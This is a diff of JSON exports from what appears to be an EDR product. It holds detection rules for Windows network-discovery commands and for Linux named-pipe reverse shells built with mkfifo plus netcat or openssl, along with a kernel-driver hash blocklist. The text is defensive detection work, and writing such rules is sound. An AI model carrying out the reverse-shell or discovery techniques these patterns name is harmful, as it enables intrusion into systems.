"origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Netstat Executed", + "creation_date": "2025-10-17", + "modified_date": "2026-01-21", + "description": "Detects the execution of the 'netstat' command on a Windows system, which is used to display active network connections, listening ports, and network statistics.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "ed109dd2-26c1-4664-bb63-b23ede14f0ee", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Net Sessions Executed", + "creation_date": "2025-10-17", + "modified_date": "2026-01-21", + "description": "Detects the execution of the 'net sessions' command on a Windows system, which displays information about active sessions on the local computer, including connected users and their resources.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + } + ], + "inner_correlation": [], + "inner_rule_counts": { + "sigma": 3, + "correlation": 0 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.713488Z", + "creation_date": "2026-03-23T11:45:27.713491Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.713497Z", + "silent": false, + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://attack.mitre.org/techniques/T1049/", + "https://attack.mitre.org/software/S0039/", + 
"https://attack.mitre.org/software/S0104/" + ], + "name": "t1049_system_network_connections_discovered_windows.yml", + "content": "title: Netstat Executed\nname: cmd_netstat\nid: 007eb20f-51e0-4032-a8b3-c02ad63835d2\ndescription: |\n Detects the execution of the 'netstat' command on a Windows system, which is used to display active network connections, listening ports, and network statistics.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961504(v=ws.11)\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\netstat.exe'\n # Renamed binaries\n - OriginalFileName: 'netstat.exe'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Net Use Executed\nname: cmd_net_use\nid: d885a69a-230a-40fb-ac5a-0c215fe11e32\ndescription: |\n Detects the execution of the 'net use' command on a Windows system, which is used to display shared network resources.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/gg651155(v=ws.11)\n - https://attack.mitre.org/software/S0039/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net.exe'\n CommandLine:\n - 'net use'\n - 'net.exe use'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Net Sessions Executed\nname: cmd_net_sessions\nid: ed109dd2-26c1-4664-bb63-b23ede14f0ee\ndescription: |\n Detects the execution of the 'net sessions' command on a Windows system, which displays information about active sessions on the local computer, including connected users and their resources.\nreferences:\n - 
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750729(v=ws.11)\n - https://attack.mitre.org/software/S0039/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net.exe'\n CommandLine:\n - 'net session'\n - 'net sessions'\n - 'net.exe session'\n - 'net.exe sessions'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: System Network Connections Discovered (Windows)\nid: eed7ad50-c4a6-476b-b3b8-c8570d32b537\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0039/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0039\n - attack.s0104\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\ncorrelation:\n type: combination\n platform: windows\n rules:\n - cmd_netstat\n - cmd_net_use\n - cmd_net_sessions\n group-by:\n - processes\n processes:\n MyProcess: created.parent\n related-process: MyProcess\n timespan: 2s\n condition: cmd_netstat and cmd_net_use and cmd_net_sessions\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "eed7ad50-c4a6-476b-b3b8-c8570d32b537", + "rule_name": "System Network Connections 
Discovered (Windows)", + "rule_description": "Detects the execution of commands to retrieve information about network connections.\nAttackers may use it during the discovery phase to display information about the system.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n", + "rule_creation_date": "2025-10-17", + "rule_modified_date": "2026-01-21", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1049" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} +{ + "id": "fc9663c5-b88d-487a-98b3-421c01431987", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "478b012d-d794-48ee-962c-a584c48967fd", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "FIFO File Created", + "creation_date": "2026-01-09", + "modified_date": "2026-01-09", + "description": "Detects the execution of mkfifo or mknod.\nBoth utilities can be used to create FIFO files, a special type of file that allows inter-process communication, where one process writes data while another process reads it 
simultaneously.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "linux", + "can_block": true + }, + { + "id": "e26f81a0-a730-425d-842c-175578204937", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "OpenSSL Execution", + "creation_date": "2026-01-09", + "modified_date": "2026-01-09", + "description": "Detects the use of OpenSSL to establish encrypted TLS/SSL connections to remote hosts.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "linux", + "can_block": true + }, + { + "id": "fe05b782-a2d0-4976-b92c-33ad9fda178f", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Netcat Execution", + "creation_date": "2026-01-09", + "modified_date": "2026-01-09", + "description": "Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "linux", + "can_block": true + } + ], + "inner_correlation": [], + "inner_rule_counts": { + "sigma": 3, + "correlation": 0 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.713568Z", + "creation_date": "2026-03-23T11:45:27.713570Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.713575Z", + "silent": false, + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://attack.mitre.org/techniques/T1059/004/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1059_004_named_pipe_reverse_shell.yml", + "content": "title: FIFO File Created\nname: fifo_file_created\nid: 478b012d-d794-48ee-962c-a584c48967fd\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create FIFO files, a special type of file that allows inter-process communication, where one process writes data while another process reads it simultaneously.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n condition: 1 of selection_*\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Netcat Execution\nname: netcat\nid: fe05b782-a2d0-4976-b92c-33ad9fda178f\ndescription: |\n Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\nreferences:\n - https://www.varonis.com/blog/netcat-commands\ndate: 2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/netcat'\n - '/ncat'\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: OpenSSL Execution\nname: openssl\nid: e26f81a0-a730-425d-842c-175578204937\ndescription: |\n Detects the use of OpenSSL to establish encrypted TLS/SSL connections to remote hosts.\nreferences:\n - https://attack.mitre.org/techniques/T1057/\n - https://attack.mitre.org/software/S0057/\ndate: 
2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'openssl*s_client'\n - 's_client*-connect*'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Named Pipe Reverse Shell Execution\nid: fc9663c5-b88d-487a-98b3-421c01431987\ndescription: |\n Detects the execution of shell commands used to create reverse shells through the use of named pipes (FIFO files).\n Such command patterns commonly leverage utilities like openssl or netcat to establish interactive remote access, potentially allowing attackers to control a compromised system while evading traditional network-based detections.\n It is recommended to investigate the process that ran this commands and its execution context to determine if this action was legitimate.\nreferences:\n - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2026/01/09\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\ncorrelation:\n type: combination\n platform: linux\n rules:\n - fifo_file_created\n - netcat\n - openssl\n group-by:\n - processes\n processes:\n ParentProcess: created.parent\n related-process: ParentProcess\n timespan: 5s\n condition: fifo_file_created and (netcat or openssl)\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "fc9663c5-b88d-487a-98b3-421c01431987", + "rule_name": "Named Pipe Reverse Shell Execution", + "rule_description": "Detects the execution of shell commands used to create reverse shells through the use of named 
pipes (FIFO files).\nSuch command patterns commonly leverage utilities like openssl or netcat to establish interactive remote access, potentially allowing attackers to control a compromised system while evading traditional network-based detections.\nIt is recommended to investigate the process that ran this commands and its execution context to determine if this action was legitimate.\n", + "rule_creation_date": "2026-01-09", + "rule_modified_date": "2026-01-23", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.004", + "attack.t1071.001" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} diff --git a/harfang_export/driver_blocklist_export.json b/harfang_export/driver_blocklist_export.json new file mode 100644 index 0000000..2dc0c25 --- /dev/null +++ b/harfang_export/driver_blocklist_export.json 
@@ -0,0 +1,245854 @@ +{ + "id": "00055d75-c4ca-5c5b-8eb0-cf1ae8fbeae4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820302Z", + "creation_date": "2026-03-23T11:45:30.820304Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820309Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ffa2791abaa004489427b2c187b64db87b49aaa0ffb2e576f0c982dbe62c62a", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "000a28de-7145-5411-8498-d995fafff2e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603951Z", + "creation_date": "2026-03-23T11:45:29.603954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.603965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4222e186d23160c29fe2bdf163d29561139eae8484d081457e7278872d7e9e2", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0010a7ec-4038-52d2-bafd-8951fd0da80c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467985Z", + "creation_date": "2026-03-23T11:45:30.467989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81237053f6eeaf659970e9e5e7abba00261ec2b850b1f5b195d0888f8ce66d6f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0016849f-5781-5d69-9677-55ab9fae5c65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462956Z", + "creation_date": "2026-03-23T11:45:30.462959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "001cbe83-97a2-5162-a1dc-71a584661ffd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149097Z", + "creation_date": "2026-03-23T11:45:31.149100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c7c17c77cadbedc05bd2cb988dd3f654fd7b43899a949ec1d63d07ede6570c4", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "002e82a9-97d5-50ea-987d-429045a2b609", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609736Z", + "creation_date": "2026-03-23T11:45:29.609738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609744Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce23c2dae4cca4771ea50ec737093dfafac06c64db0f924a1ccbbf687e33f5a2", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0031c4f5-a44b-5b66-8741-0c4516e658c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967920Z", + "creation_date": "2026-03-23T11:45:29.967922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967927Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b348190c2991baec9cdda808187712c205dbf0f3f6178b3c68bc9b13bb0d3bfe", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00373a0f-2ca7-5e52-aa17-4ddb36b93d42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811681Z", + "creation_date": "2026-03-23T11:45:31.811683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e37f4c077ae36294772acc7d23084d1ef5ab5e293974b1a872a5b18fb85f873a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "003c2e1b-9e06-598e-b9fa-2cd73aef37b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967401Z", + "creation_date": "2026-03-23T11:45:29.967403Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967409Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3e8ea5e593176f9e66c17f6a200fa665c7ef409c97f49aadf5a55ad6b0be97e", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "003c8069-8d1a-50ee-b5e8-afcaee6796a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828931Z", + "creation_date": "2026-03-23T11:45:30.828933Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4a65f4671a6fd29d5e212dfd0e87011bc969ed3d3a72ac8f0b24a20be9a8b5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00499fd4-be3f-5abf-ba9d-b5a26e40514d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811764Z", + "creation_date": "2026-03-23T11:45:31.811766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9d8be1fa973114a45254ddc7d925a2ce9349fdebded42caf8dac724afd0cfc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "004ed130-1032-5e7f-b2e6-ef0866d53b9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152722Z", + "creation_date": "2026-03-23T11:45:31.152725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cab6ae2ea21cc943a0c0e27f25de5bed2b801ac2863d7123334634411bcb3cf6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0054d0e0-4d3e-5aed-b367-10ee3412c190", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476211Z", + "creation_date": "2026-03-23T11:45:31.476214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476225Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9142fe1834f09556508cb0af1c9258211654e08a3d64aad27a46d1cdd56c17b7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "005857e6-bff5-5551-8cb0-df874e1d802a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829096Z", + "creation_date": "2026-03-23T11:45:30.829098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 